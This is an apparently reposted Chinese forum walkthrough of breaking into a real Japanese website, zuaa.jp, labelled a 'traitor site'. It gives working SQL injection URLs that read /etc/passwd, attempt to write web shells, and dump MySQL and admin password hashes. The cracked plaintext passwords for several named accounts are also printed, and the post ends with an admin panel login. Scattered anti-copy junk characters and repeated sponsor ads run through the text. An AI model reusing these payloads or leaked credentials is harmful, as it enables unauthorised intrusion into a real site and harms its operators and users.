原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

0x01. 检测 www.zuaa.jp 收集数据


whatweb
5 N" y( s& o- T0 o4 ?
7 n6 o4 X8 o# r: ~. Z$ e
% M( y' v- C' Y$ J7 Z( `利用NMAP扫描

8 Y2 C4 a( d" Q1 `中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
* x. W% T5 _$ H  Z( S& f0 L& E# E+ \0x02.找注入点
找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390

1 P3 a, n6 L+ f. q2 R( J; @2 Z
0x03.order by
8 b1 ]: i# V  m5 g7 s             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
9 v( X) N+ [  l1 S9 w# L! y* B
* |. |; t: Y8 {order by 28报错，order by 27正常
+ ^0 I+ l( }$ f+ j& ]0 I* V
9 e  V5 t1 o" s% f8 M' S3 Y0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
添加到 27 时正常显示

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
& k+ \* D' ^9 x' w2 X; x
0x05. info:
3 u" G; M# {5 o/ B4 F; Ihttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
4 ~. E. I! M2 _% o- i3 R
. R! W! W5 U. S/ \& Muser:            root@localhost
+ V; E5 a' m6 [database:    openpne
version:      4.1.22
( Q- w) v" {2 h# h, s: f/ h4 Sos:             portbld-freebsd5.4

0x06. root用户
8 g0 G+ W  J% E( T利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

0 e+ D3 l& f1 r& R8 @' V. L+ l通过工具转换
! {3 J. F4 E' H$ I$ l) S
$ a: Y6 z! l' X! X9 ]中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

, n) n! v2 h; \% W0x07. 利用 into outfile
全部都失败
+ Z( L2 [+ h& U2 C2 ~http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
+ P: p( x& f% X! S# S1 ]) @8 Y' N3 A
. A* W5 ~9 D) t+ f1 Hhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

5 L* O  Q8 c. E' ~0 s# [7 \+ l1 J页面显示“MDB2 Error:syntax error”
+ M9 a- E* _8 {) u% k
' o+ i% N, v  r+ A3 m+ d0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
3 M0 t. O- o$ S. l中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持



0x09. 查找后台
( N; Q0 s8 c& M利用 现有的各种 后台工具尝试都不行
: I) `1 Y% ]" B* E) ~( [1 _% R
* ^: S9 U3 \2 Z* h" }# ^  l) g0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
; t* A* I& l5 p4 ?2 M& khttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

这个可以在 www.cmd5.com 解密
  B, L4 |2 E& b! \8 s( q$ g1 h/ c  k2 Hroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
/ M. H; S* p: l9 J8 N  e8 v. Wchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
  ^6 ^% B. L1 B. {+ Jzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知

5 h1 R( A- V  O) C
; G* n) b0 j" K6 z5 l0x11. 网站突破
' F* {. t5 b# X" [发现网站的源程序 openpne, google 下载 openpne 源码


0x12. 默认信息利用
# Z2 t4 ]! b& ^- H- w( T+ E9 b& h: dhttp://sns.zuaa.jp/?m=admin&a=page_login
# N' X& N. Q& S9 n7 ^
表名 (c_admin_user) ，字段名（username,password）
1 ?0 k5 `  w" n. P7 B. b) Ghttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
0 w% V+ E+ @: w
* I2 }" D! z3 F% }4 r: [1 @+ G解密
5 U3 F6 @; D# w5 W8 rzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
3 b1 @, @, e% a1 P
) I, P( M( _/ j4 I( w- I中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
+ l4 C7 P! h0 T" C! ]( V" o/ w" e
, b% t, n, W# {, T0x13. 登录后台
0 `6 ~0 S1 l; s' y; E
& A. a0 R1 ~3 J+ N7 j8 Z6 n3 s

& A5 a: Z) u9 a% v: T" _1 X2 f# w5 H0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
8 c3 o1 \& ~! i' j感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
3 L0 x' `" H8 h中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
9 v! c9 ]+ a7 r1 q; z: J+ _9 l
最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
5 o1 W  g2 R( l/ @0 P; s3 D  {

荒村狂客

哪个牛人 费的这劲 入侵的